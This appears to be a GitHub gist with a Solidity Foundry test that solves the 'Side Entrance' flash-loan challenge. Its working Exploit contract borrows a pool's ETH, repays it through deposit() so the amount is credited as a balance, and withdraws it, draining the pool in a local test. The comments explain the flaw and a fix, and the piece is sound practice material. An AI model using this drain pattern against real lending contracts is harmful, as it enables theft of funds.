@BenFaruna
Last active April 6, 2024 23:42
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0;
import {Utilities} from "../../utils/Utilities.sol";
import "forge-std/Test.sol";
import {SideEntranceLenderPool} from "../src/SideEntranceLenderPool.sol";
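/// @title Exploit
/// @notice Proof-of-concept borrower used by the SideEntrance test to reproduce a
///         flash-loan accounting flaw against a locally deployed
///         SideEntranceLenderPool.
/// @dev The pool's source is not part of this file, so the following is inferred
///      from how it is called here and should be confirmed against
///      SideEntranceLenderPool.sol: flashLoan() appears to call back execute() on
///      the borrower with the loaned ETH, and the pool appears to accept ETH sent
///      back through deposit() as repayment while also crediting it to the
///      depositor's withdrawable balance. If so, the root cause is that repayment
///      is judged by the pool's ETH balance alone. The pool-side mitigation is to
///      reject deposit() while a loan is outstanding (a reentrancy guard shared by
///      flashLoan and deposit) or to accept repayment only through a path that
///      does not credit a user balance.
contract Exploit {
    /// @dev Address of the pool under test; set once in the constructor.
    address sideAddr;

    /// @param _sideAddr Address of the deployed SideEntranceLenderPool.
    constructor(address _sideAddr) {
        sideAddr = _sideAddr;
    }

    /// @notice Requests a flash loan of `_amount` wei from the pool.
    /// @dev Marked payable in the original; no msg.value is forwarded anywhere.
    /// @param _amount Amount of wei to borrow.
    function attack(uint256 _amount) public payable {
        SideEntranceLenderPool(sideAddr).flashLoan(_amount);
    }

    /// @notice Calls the pool's withdraw() and forwards this contract's whole ETH
    ///         balance to the caller.
    /// @dev The low-level call's success flag was previously discarded, so a
    ///      failed transfer left the ETH stranded in this contract while the
    ///      transaction still succeeded. It is now checked and the call reverts
    ///      on failure.
    function withdraw() public {
        SideEntranceLenderPool(sideAddr).withdraw();
        (bool sent, ) = payable(msg.sender).call{value: address(this).balance}("");
        require(sent, "ETH transfer failed");
    }

    /// @notice Callback that sends this contract's whole ETH balance to the pool
    ///         via deposit().
    /// @dev Presumably invoked by the pool during flashLoan() — confirm against
    ///      the pool source.
    function execute() external payable {
        SideEntranceLenderPool(sideAddr).deposit{value: address(this).balance}();
    }

    /// @dev Accepts plain ETH transfers, e.g. the ETH the pool sends on withdraw().
    fallback() external payable {}
}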
/// @title SideEntrance
/// @notice Foundry test that deploys a SideEntranceLenderPool funded with
///         ETHER_IN_POOL and checks that the Exploit contract can empty it.
/// @dev Serves as a regression check: once the pool is fixed, testExploit is
///      expected to fail.
contract SideEntrance is Test {
    /// @dev ETH balance given to the pool in setUp (1000 ether, in wei).
    uint256 internal constant ETHER_IN_POOL = 1_000e18;

    Utilities internal utils;
    SideEntranceLenderPool internal sideEntranceLenderPool;
    address payable internal attacker;

    /// @dev Attacker's balance recorded in setUp, compared against in validation().
    uint256 public attackerInitialEthBalance;

    /// @notice Creates the attacker account, deploys and funds the pool.
    function setUp() public {
        utils = new Utilities();

        // Single test account; how createUsers funds it is defined in Utilities,
        // which is not shown here.
        attacker = utils.createUsers(1)[0];
        vm.label(attacker, "Attacker");

        sideEntranceLenderPool = new SideEntranceLenderPool();
        address poolAddr = address(sideEntranceLenderPool);
        vm.label(poolAddr, "Side Entrance Lender Pool");

        // Set the pool's ETH balance directly with the cheatcode and confirm it.
        vm.deal(poolAddr, ETHER_IN_POOL);
        assertEq(poolAddr.balance, ETHER_IN_POOL);

        attackerInitialEthBalance = attacker.balance;

        console.log(unicode"🧨 Let's see if you can break it... 🧨");
    }

    /// @notice Runs the flash-loan / withdraw sequence as the attacker and then
    ///         validates the resulting balances.
    function testExploit() public {
        /**
         * EXPLOIT START *
         */
        // Deployed by the test contract itself; only the two calls below are
        // made with msg.sender set to the attacker.
        Exploit drainer = new Exploit(address(sideEntranceLenderPool));

        vm.startPrank(attacker);
        drainer.attack(ETHER_IN_POOL);
        drainer.withdraw();
        vm.stopPrank();
        /**
         * EXPLOIT END *
         */

        validation();
        console.log(unicode"\n🎉 Congratulations");
    }

    /// @notice Asserts the pool holds no ETH and the attacker's balance grew.
    function validation() internal {
        uint256 poolBalance = address(sideEntranceLenderPool).balance;
        assertEq(poolBalance, 0);

        uint256 attackerBalance = attacker.balance;
        assertGt(attackerBalance, attackerInitialEthBalance);
    }
}